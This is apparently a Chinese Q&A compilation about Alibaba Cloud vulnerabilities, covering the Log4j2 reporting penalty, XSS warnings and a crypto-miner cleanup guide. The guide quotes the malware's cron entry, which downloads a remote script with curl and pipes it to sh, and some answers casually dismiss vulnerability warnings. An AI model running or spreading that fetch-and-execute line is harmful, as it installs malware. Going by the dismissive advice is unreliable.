阿里雲伺服器漏洞

⑵ 阿里雲未及時通報重大漏洞，會造成什麼後果

阿里雲發布關於開源社區Apache log4j2漏洞情況的說明。阿里雲表示，Log4j2 是開源社區阿帕奇（Apache）旗下的開源日誌組件，被全世界企業和組織廣泛應用於各種業務系統開發。

工業和信息化部網路安全威脅和漏洞信息共享平台收到有關網路安全專業機構報告，阿帕奇Log4j2組件存在嚴重安全漏洞。工業和信息化部立即組織有關網路安全專業機構開展漏洞風險分析，召集阿里雲、網路安全企業、網路安全專業機構等開展研判，通報督促阿帕奇軟體基金會及時修補該漏洞，向行業單位進行風險預警。

2021財年（2020年4月1日至2021年3月31日跨年度），阿里雲營收達601億元，比上一財年400億元收入大幅增長50%，在阿里集團財年總營收7173億元總營收比例為8.38%。600億元總收入，超過多數上市公司年度總收入。

⑶ 阿里雲伺服器，提示web漏洞，跨站攻擊，請問如何處理

修復相關程序漏洞，或者安裝網路加速樂、安全狗之類伺服器防禦軟體。同時可以用多備份時刻最好數據備份，以免被攻擊造成數據丟失，網站有漏洞還會發郵件提醒，反正有備無患吧

⑷ 阿里雲未及時上報漏洞被工信部處罰，此次處罰起到了怎樣的警示作用

阿里雲未及時上報漏洞被工信部處罰，這次的處罰給了國內雲計算領域，尤其是安全領域很大的警示作用。最重要的警示就是一定要詳細了解並遵守電信主管部門的規定，否則將失去工信部重要的背書，如果沒有工信部的背書，相信在國內的任何一家企業將很難再接到政府部門的項目。這次事件對阿里雲的處罰個人覺得阿里雲不冤。阿里雲在發現阿帕奇伺服器的日誌組件漏洞後，第一時間選擇報告給了美國的阿帕奇基金會，阿帕奇基金會在收到漏洞報告後第一時間發布了漏洞補丁，這操作在行業內部是沒有問題的， 雖然技術沒有國界之分，但是企業是有的。阿里雲在履行了行業職責的同時卻忘記了自己是工信部合作單位之一，沒有履行國家的職責，所以這次處罰是應當的，下面就以個人觀點來說一說這件事給了我們怎樣的警示作用：

一、危害嚴重

這次的漏洞被譽為是十年來最大的安全漏洞，就是因為用到的那個日誌組件使用的廣泛性。但是工信部門卻在事發半月後才接到別的企業通知，而黑客在這段時間足以造成嚴重破壞。

你覺得阿里雲未及時上報漏洞被工信部處罰，此次處罰起到了怎樣的警示作用？歡迎留言討論。

⑸ 阿里雲伺服器漏洞修復怎麼修復

這種提示我見過很多，基本上每個客戶都有這個提示，可以不用理會，你看看提示內容就知道了，都是系統的，你網站有後門被篡改跟這個關系不大，除非高危的，一般給別人處理安全問題都是程序問題比較多，你網站有安全問題可以找額給你解決，後面就不會被篡改了

⑹ 伺服器報漏洞怎麼解決

系統漏洞會影響到的范圍很大，包括系統本身及其支撐軟體，網路客戶和伺服器軟體，網路路由器和安全防火牆等。
騰訊電腦管家可以修復Windows操作系統漏洞，還可以智能篩選區分出高危漏洞補丁及功能性補丁，操作方法：騰訊電腦管家-工具箱-選擇「修復漏洞」。

⑺ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

⑻ 工信部暫停阿里雲信息共享平台合作，這背後的原因是什麼

工信部這次暫停阿里雲信息共享平台合作是因為阿里雲在Web伺服器阿帕奇下的開源日誌組件log4j中發現了重大漏洞時並沒有第一時間上報給工信部，而是上報了阿帕奇開源基金會。違反了工信部的規定將暫停阿里雲作為信息共享平台的合作單位六個月，期滿後根據阿里雲的整改情況，在決定是否需要恢復阿里雲合作單位的身份。log4j作為一款JAVA開發的開源日誌記錄工具，能夠有效的記錄程序在運行過程中產生的數據，對於分析系統存在的問題或者運行狀態具有很大的作用，正因為log4j功能強大，所以在全球的使用性極其廣泛。正因為其使用的范圍很廣，所以一旦出現問題，就會造成特別嚴重的後果。

你知道工信部暫停阿里雲信息共享平台合作，這背後的原因是什麼？ 歡迎留言討論。